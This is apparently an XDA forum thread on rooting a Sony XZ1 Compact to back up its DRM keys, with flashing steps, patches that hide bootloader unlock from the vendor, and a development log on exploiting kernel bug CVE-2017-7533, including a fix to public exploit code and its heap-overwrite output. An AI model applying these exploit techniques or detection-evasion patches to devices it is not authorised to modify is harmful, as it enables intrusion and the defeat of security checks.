dd if=TA-locked.img of=/dev/block/bootdevice/by-name/TA
sync
sync
boot up the phone with the current fw and see about the camera if it works on not
You may also document the security screen state by taking a screenshot. Do not forget to transfer it from the phone to PC.
flash twrp recovery
Updated on 2019-08-08: please see post#1029 for the latest workflow with the kernels hiding bootloader unlock status.
Updated on 2019-02-10:
Instead of flashing twrp, you may just 'fastboot boot' it if you need it.
Instead of the steps 10. to 13., you may use patched and rooted kernel hiding bootloader unlock available in following forum threads in order to be able to even install FOTA system update
[XZ1c] rooted kernel hiding bootloader unlock with working fota
[XZ1] rooted kernel hiding bootloader unlock with working fota
[XZp] rooted kernel hiding bootloader unlock with working fota
giving you back sony drm functionality that fw disables when it detects unlocked bootloader status. For more details see also post#645 of this thread.
OPTIONAL step (only for XZ1c maybe XZ1)
This step is optional and only lightly tested. The idea is that secd detects unlocked bootloader and switches to limited mode even though drm keys are available. This can be seen in the adb logcat with following message:
Code:
E secd : secd_backend_credential_manager.cpp:77 the bootloader is unlocked, use limited functionality
To workaround that, we may use a secd ripped from secd extension by modpunk - just flash attached secd-ignore-unlock.zip at bottom of this post via twrp recovery (do not flash the 'secd extension by modpunk' which is linked here only for reference).
I've analysed, what changes were done in the secd. Also the lib which fixes the missing device key in TA is not needed from the modpunk's package as we have the real valid key there, so I've removed the lib (and the script which would preload it). Therefore it is just about making secd think that bootloader was not unlocked. Thanks to @modpunk for the patched secd and @russel5 for the flashable zip on which the secd-ignore-unlock.zip is based on.
With this, sony updates may start to arrive.
Please note, this would make sony think the phone runs unmodified and still locked fw. OTA updates may restore original secd or fail altogether (due to modified system/vendor/... partitions).
You may boot the phone to see what happens (OTA updates?) - edit: OTA updates did come, but install to be done on reboot failed - tested by @Unbounded, see post#43 and #44 of the attest key thread please - this may confirm the availability of the SOMC Attest Key which may be the key needed to get sony ota updates (just a guess, not sure what exactly this key is used for).
Again, this step is optional and very experimental, maybe better not to apply it (camera works without this step on any stock fw without any change /until sony changes that in some update/).
Update: see post#395 for secd_ignore_unlock for XZ1c for pie from @S-trace - thank you. It works with XZ1 too (see post#396). The patch port for XZp pie is here: attest key thread post#67.
In my opinion all these secd patch variants are hiding the unlocked state only partially. There are other components in the fw that ask about the unlock state. A proper solution for this is the unlock hiding patched kernel linked in the step 10. of this howto.
flash a recent stock firmware
In case you wanted the patched secd, flash it again over the flashed fw.
Boot the phone, check functionality, take screenshots.
install magisk if rooted phone is what you need; -)
Follow instructions of latest magisk, it should work without any special actions.
AUTOMATED FULL BACKUP
These are experimental tools (and actually seem not to work in some cases getting truncated files that are useless) to extract most of the partitions from the phone after getting a temp root. It can be used for comparisons/analysis of what unlock changes (download backup-tools.zip at bottom of this post).
You would run backup-setup.bat in windows command prompt first (you may need to adjust the PATH setting to find adb properly) to copy the tools to the phone and setup tcp forwarding for netcat based copying.
Then using adb shell you would do:
Code:
cd /data/local/tmp
./backup-send.sh
and in windows command prompt you would start:
Code:
backup-recv.bat bk-unlocked
and partitions images would be extracted from the phone (for larger ones sparse android image format is used).
Full depth comparison could be achieved by use of these backup tools (obviously needs to be done twice - before and after unlock, changing the target directory name argument of backup-recv.bat).
WHAT WORKS
Here is a quote of post#185 from @tramtrist in this thread describing the results of the initial tests - special thanks to him!
tramtrist said:
I'd like to report in real quick on what's working.
After following @j4nn very clear instructions and backing up/restoring my TA keys I was left with the NOT PROVISIONED messages he mentioned earlier. However this seems to be no problem as after TA-restore my camera works as it did before. I'm also able to use WIDEVINE sites which require that key as well.
After restoring TA I went ahead and flashed the latest UK customized firmware
I then flashed TWRP latest version 3.2.3
I wanted to have root so I flashed Magisk 1.73 and safety net worked without me having to do anything special.
Google Pay could be set up and seems to be using my credit cards just fine.
I didn't flash any custom kernel as stock is just fine for me.
Adaway is working with root without issue.
All-in-all if you follow @j4nn instructions when he's ready to fully release them to the public then I'd say you will be in good shape.
I'd like to thank @j4nn for giving me the chance to finally contribute something concrete to this community. If you're gonna use this you should drop him some cash.
Click to expand...
Click to collapse
Update: if you follow the links added in step 10. and use "rooted kernel hiding bootloader unlock", it seems you can have all functionality restored including fota system updates while having magisk root with passed safetynet cts. Verified by @notaz in post#14 of the "[XZ1c] rooted kernel hiding bootloader unlock" thread. Thanks.
ACKNOWLEDGEMENTS
Many thanks to following users:
@moofesr - for testing initial kernel builds until proper build procedure had been found, special thanks for his patience when all tests resulted with bootloop
@Raz0Rfail and @moofesr - for testing timing of rename/notify vulnerability with patched kernel
@dosomder (aka zxz0O0) - for his iovyroot
@tramtrist - for initial testing of TA backup, unlock and restore, special thanks for exposing to risk of loosing drm if it did not work
@tonsofquestions - for a lot of testing with unlocked-ta-restored phone when I did not have an unlocked phone yet
ThomasKing (not a user on xda) - for his black hat ksma presentation
few other users in this and attest key lost thread here on xda - for some other cve possibilities, ideas and specific tests
DONATIONS
Please note: I had to invest enormously lot of time (as you can see throughout this thread and also summarized in progress/change log in post#2) to develop these tools, the code is extremely complex (more than 9000 lines of source code) and it was unbelievable hard to debug and get the timing usable.
It would be kind of you if you could consider donating here please:
https://j4nn.github.io/donate/
I would be happy to accept any donation to me as a form of gratitude in case the software helped you to backup your TA (drm keys) before bootloader unlocking.
Thanks.
DOWNLOAD THE TOOLS
See the attached renoroot.zip at bottom of this post.
Please post your experience with using the tools, if it worked and on which phone model (and fw in case of xz1c).
You may include info about how long it took to get a root shell, how many reboots, how many events in the last trial which succeeded with how many overwrites (just one with success is the best, more means previous overwrites did not hit wanted object in shaped heap resulting with possibly unstable system). This info is interesting for statistics, so we all know, how fast can we get a temp root on each device/firmware.
Thanks.
DEVELOPMENT PROGRESS / CHANGE LOG
26-05-2018 started this thread listing vulnerabilities found during many weeks of research done right after buy of my XZ1c phone
06-06-2018 post#7: managed to boot kernel from the 47.1.A.2.281 fw in qemu
16-06-2018 post#25: simple out of bounds overwrite not useful, complex exploiting of use after free needed
02-07-2018 post#33: explained how use after free exploit would work, but timing is impossible: kfree from rcu too late
06-07-2018 post#44 and post#48: more details about exploiting use after free and kfree_rcu too late kfree timing problem
17-07-2018 post#53: first kernel to test timing, did not boot when tried with unlocked xz1c
27-07-2018 post#73: solved the problem with delayed kfree from kfree_rcu, basic inotify/rename proof of concept running in qemu for long filenames
27-07-2018 post#75: found a way to build xz1c kernel from source which can be booted on unlocked xz1c, confirmed the delayed kfree from rcu timing problem
11-08-2018 post#88: extensive testing of timing
20-08-2018 post#104: inotify/rename exploit now works with long filenames, allowing kernel heap (256 bytes slub unit) overflow, overview of next phases of the exploit yet to be implemented
31-08-2018 post#118: implemented mostly arbitrary kernel write _together_ with mostly arbitrary kernel read, first bypass of KASLR but we need to bypass PXN & PAN too
15-09-2018 post#131: found that we will need ROP/JOP gadgets to overcome PXN & PAN oreo mitigations, more details in post#135
22-09-2018 post#137: first arbitrary kernel space read and write proof of concept working in qemu
22-09-2018 post#138: with great timing luck kernel space R/W poc worked on still locked xz1c
05-10-2018 post#146: first backup of my xz1c locked TA done: asking for an unlock-and-TA-restore test volunteer
07-10-2018 post#151: confirmed that BL unlock removed 66667 unit - device master key?
18-10-2018 post#162: exploit not reliable enough for public use yet
22-10-2018 post#165: renoroot preview video, send initial test version to @tramtrist
22-10-2018 post#168: renoroot initial test results - after TA restore camera works, BL remains unlocked
25-10-2018 post#185: more initial test results directly from @tramtrist
28-10-2018 post#199: researched possible uses of various keys from security service menu
03-11-2018 post#206: renoroot temp root including tools and howto for TA partition (drm keys) backup released, put everything on the first page
05-11-2018 post#235: renoroot confirmed working with other phone models
10-11-2018 post#287: ordered a new xz1c just for testing and development work
18-11-2018 post#348: the new xz1c arrived
22-11-2018 post#372: a persistent root from a temp root possibility - but not with selinux
11-12-2018 post#428: possibly the fastest temp root - 6.03 seconds with just 53 events and 1 overwrite
05-01-2019 post#493: explained about TA restore not re-locking bootloader - good for us!
09-01-2019 post#515: intercept BL unlock of xz1c in the middle of the procedure
10-01-2019 post#516: posted few videos to highlight key points when preparing for unlock with backup of TA via renoroot temproot
10-01-2019 post#517: video showing xz1c bl unlock with twrp booted in the middle
11-01-2019 post#520: howto for unlock with the twrp booted in the middle
19-01-2019 post#602: info about test to write dev master key TA unit from the secd process
30-01-2019 post#620: info about TA restore and various drm keys
02-02-2019 post#623: preview of FOTA system update fully installed with unlocked and rooted XZ1c - it confirms all functionality of a locked phone have been restored
05-02-2019 post#633: tested fota system update from oreo to pie - posted a video
10-02-2019 post#645: kernels hiding bootloader unlock released for XZ1c/XZ1/XZp - with locked TA restored this brings root with all locked phone functionality of stock fw restored
16-02-2019 post#652: ported BL unlock hiding patch to TAMA platform for testing with XZ2 (it worked, but cannot be booted via fastboot due to bug in bootloader according to sony /more details here/)
19-02-2019 post#663: patched XZ2 kernel to make it boot via 'fastboot boot' command from usb (tested successfully by @serajr post#664) - shall be useful for twrp setup on TAMA platform (post#668 by @MartinX3)
19-02-2019 post#672: fota system update with my rooted kernels verified with XZ2 phone by @serajr - so we may have fota system update with root on xz2/xz2c/xz2p/xz3 phones too (theoretically)
---->> moved the original opening post in here ----
Downgrade XZ1 Compact to 47.1.A.2.281 firmware version (not sure if this downgrade is safe, see android-attest-key-lost thread here please). The 47.1.A.2.324_CE1 version might be better to try first.
The 2.281 fw results with android security patch level 2017-08-05, kernel 4.4.74, android oreo.
BlueBorne vulnerabilities are not patched yet with this firmware:
CVE-2017-0785 Android information leak vulnerability PoC seems to work - tested myself.
Not sure, but it seems that bluetooth service is not a 32bit process anymore, contrary the note in BlueBorne whitepaper /The Bluetooth service in Android runs under Zygote (Android service manager), and is surprisingly a 32-bit process (even when the OS and CPU are ARM-64 for instance/ - example of stack dump obtained:
Code:
000000b0 00 00 00 00 ff ff ff fd ff ff ff ff d8 69 f4 80 │····│····│····│·i··│
000000c0 00 00 00 73 e8 60 0c 10 00 00 00 73 e8 60 01 40 │···s│·`··│···s│·`·@│
000000d0 00 00 00 73 d8 6b 20 08 00 00 00 73 e8 69 06 d0 │···s│·k ·│···s│·i··│
...
000007e0 00 00 00 73 2c 32 34 38 72 68 74 20 20 64 61 65 │···s│,248│rht │ dae│
000007f0 65 6d 61 6e 5f 74 62 20 6b 72 6f 77 75 65 75 71 │eman│_tb │krow│ueuq│
00000800 74 73 20 65 65 74 72 61 00 00 00 64 00 00 00 00 │ts e│etra│···d│····│
Those '00 00 00 73' are often present, quite possibly the upper 32bit part of a 64bit pointer. The text at 7e8 may be something like 'thread name bt_workqueue started', possibly indicating the CVE-2017-078 PoC worked (modified so that 'n = 90' to receive more data).
The first idea was to make the Android BlueBorne exploit working to obtain bluetooth service credentails and use that with some kernel exploit to switch to root in order to finally do TA partition backup (to save DRM keys).
The bluetooth user seems to have the NET_ADMIN capability, that could be very useful.
I've researched further possible kernel exploits and it seems to me that the kernel from 2.281 firmware seems to contain (at least) following vulnerabilities:
CVE-2017-7308 AF_PACKET packet_set_ring
This needs NET_RAW capability, that may be hard to obtain, bluetooth service seems not to have it.
CVE-2017-7533 race between inotify_handle_event() and vfs_rename()
https://exploit.kitploit.com/2017/08/linux-kernel-412-race-condition.html
This may work as a standalone exploit - checked the kernel source - vulnerability is not fixed, not sure about SElinux limitations and other android security mitigations - please discuss this.
Found only demo poc not getting root, but it may be possibly developed to full temp root standalone exploit.
This currently seems to be the most promising.
CVE-2017-1000112 memory corruption in UDP fragmentation offload
https://securingtomorrow.mcafee.com...vilege-escalation-analyzing-cve-2017-1000112/
https://ricklarabee.blogspot.cz/2017/12/adapting-poc-for-cve-2017-1000112-to.html
https://www.exploit-db.com/exploits/43418/
This could be used after BlueBorne done, as it needs NET_ADMIN capability.
HELP NEEDED PLEASE - let's collaborate and develop together the needed exploits!
For example it is hard for me to develop only with a locked device, better debugging may be possible on stock firmware with unlocked bootloader as some modifications may be flashed. My free time is quite limitted, so it would be useful to split the work.
----<< moved the original opening post in here ----
It seems that 'CVE-2017-7533 race between inotify_handle_event() and vfs_rename()' is not possible to trigger from adb shell - possibly some android security mitigations/selinux limitation?
Built exploit.c from CVE-2017-7533 with attached View attachment CVE-2017-7533-android-build.tar.gz android makefiles, adb pushed to /data/local/tmp:
Code:
G8441:/ $ uname -a
Linux localhost 4.4.74-perf+ #1 SMP PREEMPT Wed Aug 9 16:09:57 2017 aarch64
G8441:/ $ cd /data/local/tmp
G8441:/data/local/tmp $ ./exploit 2>err.log
Listening for events.
Listening for events.
alloc_len : 50
longname="test_dir/bbbb32103210321032100��1����test_dir/bbbb3210321032103210"
alloc_len : 50
callrename done.
G8441:/data/local/tmp $
the notify events seem not to be received
The rename function works in the exploit (tested separately), but many errors such as
rename1: No such file or directory
rename2: No such file or directory
are returned from the exploit though.
The inotify_init1 function returns valid fd, so it looks like everything is ok, but for unknown reason, inotify events are not received.
Running the same code in linux with vulnerable kernel results with this:
Code:
Linux 4.8.0 #1 SMP Tue Oct 25 09:09:01 UTC 2016 x86_64 Intel(R) Core(TM) i5-2500K CPU @ 3.30GHz GenuineIntel GNU/Linux
Listening for events.
Listening for events.
alloc_len : 50
longname="test_dir/bbbb32103210321032100ÿÿ1ÿÿÿÿ"
handle_events() event->name : bbbb32103210321032100ÿÿ1ÿÿÿÿ, event->len : 32
handle_events() event->name : b, event->len : 16
Detected overwrite!!!
callrename done.
alloc_len : 50
Note the 'handle_events' log message presence - that indicates receive of inotify event. The rename errors are not returned in this case.
That means even though the kernel is vulnerable (as verified in sony release source code - it is fixed since 47.1.A.12.34 version as can be seen with 'git log --stat -p origin/47.1.A.12.xxx -- fs/dcache.c' in sony's kernel git repository), it looks like we cannot trigger the bug simply from adb shell.
This is what is configured in the kernel (using sony's build instructions):
CONFIG_FSNOTIFY=y
CONFIG_DNOTIFY=y
CONFIG_INOTIFY_USER=y
# CONFIG_FANOTIFY is not set
Am I missing something? Any idea why the bug cannot be triggered?
--previous edit-- 27-05-2018 at 22:58. Reason: added info about rename() on xz1c; added info about inotify_init1() on xz1c; added info about 1st fw version with a fix and relevant kernel config options
It doesn't trigger because the exploit itself is broken:
Code:
@@ -280,7 +280,7 @@ void *callrename( void *ptr )
char enter = 0;
char origname[1024];
char longname[1024];
- char next_ptr[8] = "\x30\xff\xff\x31\xff\xff\xff\xff";
+ char next_ptr[9] = "\x30\xff\xff\x31\xff\xff\xff\xff";
char prev_ptr[8] = "";
// This value will overwrite the next (struct fsnotify_event)event->list.next
With that it should work (not tested though).
Elevating through heap/slab overflow is not going to be straightforward though. As the redhat description states, we could redirect the free list pointer to userspace and provoke the kernel to put some function pointers there for us to modify, but as soon as a context switch happens the system will crash and burn. I guess easiest way would be to combine this with some older heap overflow exploit, assuming such thing exists (haven't looked)...
Thanks, your change really made it working:
Code:
G8441:/data/local/tmp $ ./exploit
Listening for events.
Listening for events.
alloc_len : 50
longname="test_dir/bbbb32103210321032100��1����"
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
...
handle_events() event->name : b, event->len : 16
Detected overwrite!!!
alloc_len : 50
callrename done.
So this could be a way after all even though not easy.
It has been done already, oreo root exploit is existing and it uses the CVE-2017-7533 (race between inotify and rename) as a starting point. Unfortunately the exploit itself is not released yet.
There are slides explaining basics about the exploit available:
asia-18-WANG-KSMA-Breaking-Android-kernel-isolation-and-Rooting-with-ARM-MMU-features.pdf
It continues even with a lot more interesting second stage exploit which mirrors kernel space memory for user space access using forgotten/overlooked feature of arm page table (address translation) setup.
Not sure when the exploit may be released - they are probably holding it back intentionally.
I guess that it will not be released for a long time because the Kernel Space Mirroring Attack is a totally new vulnerability (probably even without CVE yet). So they wait first for CVE assignment and then wait for google to release a fix and wait even more to allow vendors to deploy it to customers.
There are patches to KSMA being discussed on LKML since May 29th so things are moving on.
There's also a demo of the exploit here: https://youtube.com/watch?v=2zGTEv-iUOY
Managed to boot kernel from the 47.1.A.2.281 fw in qemu - dmesg here:
Code:
[ 0.000000] Booting Linux on physical CPU 0x0
[ 0.000000] Initializing cgroup subsys cpuset
[ 0.000000] Initializing cgroup subsys cpu
[ 0.000000] Initializing cgroup subsys cpuacct
[ 0.000000] Initializing cgroup subsys schedtune
[ 0.000000] Linux version 4.4.74-perf+ ([email protected]) (gcc version 4.9.x 20150123 (prerelease) (GCC) ) #1 SMP PREEMPT Wed Aug 9 16:09:57 2017
[ 0.000000] Boot CPU: AArch64 Processor [411fd070]
[ 0.000000] Machine: linux,dummy-virt
[ 0.000000] cma: Reserved 16 MiB at 0x00000000bf000000
[ 0.000000] On node 0 totalpages: 524288
[ 0.000000] DMA zone: 8192 pages used for memmap
[ 0.000000] DMA zone: 0 pages reserved
[ 0.000000] DMA zone: 524288 pages, LIFO batch:31
[ 0.000000] psci: probing for conduit method from DT.
[ 0.000000] psci: PSCIv0.2 detected in firmware.
[ 0.000000] psci: Using standard PSCI v0.2 function IDs
[ 0.000000] psci: Trusted OS migration not required
[ 0.000000] psci: Initializing psci_cpu_init
[ 0.000000] PERCPU: Embedded 21 pages/cpu @ffffffc07efaf000 s47936 r8192 d29888 u86016
[ 0.000000] pcpu-alloc: s47936 r8192 d29888 u86016 alloc=21*4096
[ 0.000000] pcpu-alloc: [0] 0 [0] 1
[ 0.000000] CPU features: enabling workaround for ARM erratum 832075
[ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 516096
[ 0.000000] Kernel command line: nokaslr androidboot.selinux=permissive
[ 0.000000] PID hash table entries: 4096 (order: 3, 32768 bytes)
[ 0.000000] Dentry cache hash table entries: 262144 (order: 9, 2097152 bytes)
[ 0.000000] Inode-cache hash table entries: 131072 (order: 8, 1048576 bytes)
[ 0.000000] software IO TLB [mem 0xb8a00000-0xbca00000] (64MB) mapped at [ffffffc078a00000-ffffffc07c9fffff]
[ 0.000000] Memory: 1923764K/2097152K available (17918K kernel code, 2652K rwdata, 8904K rodata, 10240K init, 2852K bss, 157004K reserved, 16384K cma-reserved)
[ 0.000000] Virtual kernel memory layout:
[ 0.000000] modules : 0xffffff8000000000 - 0xffffff8008000000 ( 128 MB)
[ 0.000000] vmalloc : 0xffffff8008000000 - 0xffffffbdbfff0000 ( 246 GB)
[ 0.000000] .init : 0xffffff8009c00000 - 0xffffff800a600000 ( 10240 KB)
[ 0.000000] .text : 0xffffff8008080000 - 0xffffff8009200000 ( 17920 KB)
[ 0.000000] .rodata : 0xffffff8009200000 - 0xffffff8009c00000 ( 10240 KB)
[ 0.000000] .data : 0xffffff800a600000 - 0xffffff800a897300 ( 2653 KB)
[ 0.000000] vmemmap : 0xffffffbdc0000000 - 0xffffffbfc0000000 ( 8 GB maximum)
[ 0.000000] 0xffffffbdc0000000 - 0xffffffbdc2000000 ( 32 MB actual)
[ 0.000000] fixed : 0xffffffbffe7fd000 - 0xffffffbffec00000 ( 4108 KB)
[ 0.000000] PCI I/O : 0xffffffbffee00000 - 0xffffffbfffe00000 ( 16 MB)
[ 0.000000] memory : 0xffffffc000000000 - 0xffffffc080000000 ( 2048 MB)
[ 0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=2, Nodes=1
[ 0.000000] HMP scheduling enabled.
[ 0.000000] Preemptible hierarchical RCU implementation.
[ 0.000000] RCU dyntick-idle grace-period acceleration is enabled.
[ 0.000000] RCU restricting CPUs from NR_CPUS=8 to nr_cpu_ids=2.
[ 0.000000] RCU kthread priority: 1.
[ 0.000000] RCU: Adjusting geometry for rcu_fanout_leaf=16, nr_cpu_ids=2
[ 0.000000] NR_IRQS:64 nr_irqs:64 0
[ 0.000000] GICv2m: Node v2m: range[0x8020000:0x8020fff], SPI[80:144]
[ 0.000000] Offload RCU callbacks from all CPUs
[ 0.000000] Offload RCU callbacks from CPUs: 0-1.
[ 0.000000] Architected cp15 timer(s) running at 62.50MHz (virt).
[ 0.000000] clocksource: arch_sys_counter: mask: 0xffffffffffffff max_cycles: 0x1cd42e208c, max_idle_ns: 881590405314 ns
[ 0.000129] sched_clock: 56 bits at 62MHz, resolution 16ns, wraps every 4398046511096ns
[ 0.000754] clocksource: Switched to clocksource arch_sys_counter
[ 0.002862] Calibrating delay loop (skipped), value calculated using timer frequency.. 125.00 BogoMIPS (lpj=625000)
[ 0.003047] pid_max: default: 32768 minimum: 301
[ 0.003929] Security Framework initialized
[ 0.004069] SELinux: Initializing.
[ 0.004522] SELinux: Starting in permissive mode
[ 0.004966] Mount-cache hash table entries: 4096 (order: 3, 32768 bytes)
[ 0.005017] Mountpoint-cache hash table entries: 4096 (order: 3, 32768 bytes)
[ 0.023663] Initializing cgroup subsys memory
[ 0.024136] Initializing cgroup subsys freezer
[ 0.024256] Initializing cgroup subsys debug
[ 0.038338] /cpus/[email protected]: Unknown CPU type
[ 0.038415] /cpus/[email protected]: Unknown CPU type
[ 0.038571] CPU0: update cpu_capacity 1024
[ 0.039453] ASID allocator initialised with 65536 entries
[ 0.078493] mem dump base table DT node does not exist
[ 0.078665] couldn't find /soc/[email protected] node
[ 0.090148] CPU1: update cpu_capacity 1024
[ 0.090682] CPU1: Booted secondary processor [411fd070]
[ 0.095452] Brought up 2 CPUs
[ 0.095541] SMP: Total of 2 processors activated.
[ 0.095833] CPU: All CPU(s) started at EL1
[ 0.096572] alternatives: patching kernel code
[ 0.323842] CPU1: update max cpu_capacity 1024
[ 0.341084] CPU1: update max cpu_capacity 1024
[ 0.351666] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 19112604462750000 ns
[ 0.351818] futex hash table entries: 512 (order: 3, 32768 bytes)
[ 0.357620] pinctrl core: initialized pinctrl subsystem
[ 0.360215] debug region node not found
[ 0.372552] NET: Registered protocol family 16
[ 0.376688] schedtune: init normalization constants...
[ 0.376756] schedtune: disabled!
[ 0.401557] cpuidle: using governor ladder
[ 0.421111] cpuidle: using governor menu
[ 0.441126] cpuidle: using governor qcom
[ 0.441993] vdso: 2 pages (1 code @ ffffff8009206000, 1 data @ ffffff800a604000)
[ 0.447772] DMA: preallocated 256 KiB pool for atomic allocations
[ 0.470943] exit: IPA_USB init success!
[ 0.499315] of_amba_device_create(): amba_device_add() failed (-517) for /[email protected]
[ 0.501005] of_amba_device_create(): amba_device_add() failed (-517) for /[email protected]
[ 0.501372] of_amba_device_create(): amba_device_add() failed (-517) for /[email protected]
[ 0.603967] ACPI: Interpreter disabled.
[ 0.604525] socinfo_init: Can't find SMEM_HW_SW_BUILD_ID; falling back on dummy values.
[ 0.605154] Unknown SOC ID!
[ 0.605447] ------------[ cut here ]------------
[ 0.605487] WARNING: at /home/hudsonslave/root/workspace/offbuild_pre-yoshino2-2.0.0_android_matrix/HUDSON_PRODUCT/lilac/HUDSON_VARIANT/user/label/CM/kernel/msm-4.4/drivers/soc/qcom/socinfo.c:1622
[ 0.605547] Modules linked in:
[ 0.605652]
[ 0.605853] CPU: 1 PID: 1 Comm: swapper/0 Not tainted 4.4.74-perf+ #1
[ 0.605889] Hardware name: linux,dummy-virt (DT)
[ 0.605991] task: ffffffc0784d8000 ti: ffffffc0784b4000 task.ti: ffffffc0784b4000
[ 0.606070] PC is at socinfo_init+0x118/0x7a4
[ 0.606123] LR is at socinfo_init+0x118/0x7a4
[ 0.606153] pc : [<ffffff8009c36b98>] lr : [<ffffff8009c36b98>] pstate: 60400045
[ 0.606177] sp : ffffffc0784b7c80
[ 0.606216] x29: ffffffc0784b7cf0 x28: ffffff8009c81a00
[ 0.606279] x27: ffffff8009c73590 x26: ffffff8009c73570
[ 0.606311] x25: ffffff8009c004b4 x24: ffffff800a9f82f0
[ 0.606341] x23: 0000000000000000 x22: 0000000000000001
[ 0.606371] x21: ffffff800a606000 x20: ffffff800a9f8000
[ 0.606401] x19: ffffff800927a000 x18: 0000000000040000
[ 0.606431] x17: 0000000000003a7f x16: 0000000000000002
[ 0.606461] x15: 0000000000007fff x14: 7564206e6f206b63
[ 0.606491] x13: ffffffffffff0000 x12: 0000000000000028
[ 0.606521] x11: 0000000000000006 x10: ffffff800a89e000
[ 0.606570] x9 : 0000000000000057 x8 : 0000000000000000
[ 0.606601] x7 : 0000000000000000 x6 : ffffff800a89f14e
[ 0.606631] x5 : 0000000000000000 x4 : 0000000000000000
[ 0.606660] x3 : 0000000000000000 x2 : ffffffc0784b4000
[ 0.606689] x1 : 0000000000000000 x0 : 000000000000000f
[ 0.606765]
[ 0.606765] PC: 0xffffff8009c36b58:
[ 0.606801] 6b58 2a1703e2 2a1603e3 52800004 52800185 97956505 52800180 b9000b00 14000002
[ 0.607340] 6b78 b9000b00 f9417a80 b4000060 b9400400 350000a0 90ffde00 912c8000 979564fa
[ 0.607704] 6b98 d4210000 f9417a80 b40000a0 b9400401 71051c3f 54000049 d4210000 b9400401
[ 0.608063] 6bb8 f0ffb200 911aa000 910bc296 8b011000 b940c000 b9000ec0 97a6ab44 b9400ac3
[ 0.608465]
[ 0.608465] LR: 0xffffff8009c36b58:
[ 0.608495] 6b58 2a1703e2 2a1603e3 52800004 52800185 97956505 52800180 b9000b00 14000002
[ 0.608880] 6b78 b9000b00 f9417a80 b4000060 b9400400 350000a0 90ffde00 912c8000 979564fa
[ 0.609281] 6b98 d4210000 f9417a80 b40000a0 b9400401 71051c3f 54000049 d4210000 b9400401
[ 0.609640] 6bb8 f0ffb200 911aa000 910bc296 8b011000 b940c000 b9000ec0 97a6ab44 b9400ac3
[ 0.610033]
[ 0.610033] SP: 0xffffffc0784b7c40:
[ 0.610062] 7c40 09c36b98 ffffff80 784b7c80 ffffffc0 09c36b98 ffffff80 60400045 00000000
[ 0.610464] 7c60 ffffffff 00000000 00000000 00000000 ffffffff ffffffff 6c6c7443 6e721f78
[ 0.610948] 7c80 784b7c90 ffffffc0 ff0a0005 ffffffff 784b7d10 ffffffc0 083ad368 ffffff80
[ 0.611330] 7ca0 0000020f 00000000 0a89b000 ffffff80 09aac8b8 ffffff80 09c36a80 ffffff80
[ 0.611725]
[ 0.611845] ---[ end trace cf17d4d9cad0286c ]---
[ 0.611997] Call trace:
[ 0.612231] Exception stack(0xffffffc0784b7ab0 to 0xffffffc0784b7be0)
[ 0.612455] 7aa0: ffffff800927a000 0000008000000000
[ 0.612613] 7ac0: 0000000042b66000 ffffff8009c36b98 ffffff80097286c0 ffffff800a626f48
[ 0.612730] 7ae0: 0000000100000000 ffffff800a89f130 ffffffc0784b7b00 ffffff8008110ce0
[ 0.612845] 7b00: ffffffc0784b7ba0 ffffff800811104c ffffff8008111014 ffffff800a9f8000
[ 0.612960] 7b20: ffffff800a606000 0000000000000001 0000000000000000 ffffff800a9f82f0
[ 0.613074] 7b40: ffffff8009c004b4 ffffff8009c73570 000000000000000f 0000000000000000
[ 0.613187] 7b60: ffffffc0784b4000 0000000000000000 0000000000000000 0000000000000000
[ 0.613304] 7b80: ffffff800a89f14e 0000000000000000 0000000000000000 0000000000000057
[ 0.613418] 7ba0: ffffff800a89e000 0000000000000006 0000000000000028 ffffffffffff0000
[ 0.613534] 7bc0: 7564206e6f206b63 0000000000007fff 0000000000000002 0000000000003a7f
[ 0.613661] [<ffffff8009c36b98>] socinfo_init+0x118/0x7a4
[ 0.613719] [<ffffff8008083adc>] do_one_initcall+0xc4/0x1dc
[ 0.613771] [<ffffff8009c00e68>] kernel_init_freeable+0x1a8/0x248
[ 0.613810] [<ffffff80091051c4>] kernel_init+0x18/0x138
[ 0.613840] [<ffffff80080830c0>] ret_from_fork+0x10/0x50
[ 0.614477] can't find qcom,msm-imem node
[ 0.614555] socinfo_print: v0.1, id=0, ver=0.1
[ 0.614876] msm_bus_fabric_init_driver
[ 0.617203] vgaarb: loaded
[ 0.619519] SCSI subsystem initialized
[ 0.621504] usbcore: registered new interface driver usbfs
[ 0.621968] usbcore: registered new interface driver hub
[ 0.622562] usbcore: registered new device driver usb
[ 0.623818] media: Linux media interface: v0.10
[ 0.624062] Linux video capture interface: v2.00
[ 0.636355] dev-cpufreq: No tables parsed from DT.
[ 0.637869] Advanced Linux Sound Architecture Driver Initialized.
[ 0.646543] Bluetooth: ffffffc0784b7cf0
[ 0.646800] NET: Registered protocol family 31
[ 0.646850] Bluetooth: ffffffc0784b7cf0
[ 0.647078] Bluetooth: ffffffc0784b7cd0Bluetooth: ffffffc0784b7ca0
[ 0.647570] Bluetooth: ffffffc0784b7cb0<6>[ 0.652956] NetLabel: Initializing
[ 0.653014] NetLabel: domain hash size = 128
[ 0.653038] NetLabel: protocols = UNLABELED CIPSOv4
[ 0.654938] cfg80211: World regulatory domain updated:
[ 0.654992] cfg80211: DFS Master region: unset
[ 0.655037] cfg80211: (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp), (dfs_cac_time)
[ 0.655125] cfg80211: (2402000 KHz - 2472000 KHz @ 20000 KHz), (N/A, 2000 mBm), (N/A)
[ 0.655163] cfg80211: (2457000 KHz - 2482000 KHz @ 20000 KHz), (N/A, 2000 mBm), (N/A)
[ 0.655188] cfg80211: (5170000 KHz - 5250000 KHz @ 80000 KHz), (N/A, 2000 mBm), (N/A)
[ 0.655234] cfg80211: (5250000 KHz - 5330000 KHz @ 80000 KHz), (N/A, 2000 mBm), (0 s)
[ 0.655260] cfg80211: (5490000 KHz - 5730000 KHz @ 80000 KHz), (N/A, 2000 mBm), (0 s)
[ 0.655284] cfg80211: (5735000 KHz - 5835000 KHz @ 80000 KHz), (N/A, 1400 mBm), (N/A)
[ 0.656154] NetLabel: unlabeled traffic allowed by default
[ 0.656738] pcie:pcie_init.
[ 0.662722] clocksource: Switched to clocksource arch_sys_counter
[ 0.879216] pnp: PnP ACPI: disabled
[ 0.883774] NET: Registered protocol family 2
[ 0.891608] TCP established hash table entries: 16384 (order: 5, 131072 bytes)
[ 0.892033] TCP bind hash table entries: 16384 (order: 6, 262144 bytes)
[ 0.892514] TCP: Hash tables configured (established 16384 bind 16384)
[ 0.893122] UDP hash table entries: 1024 (order: 3, 32768 bytes)
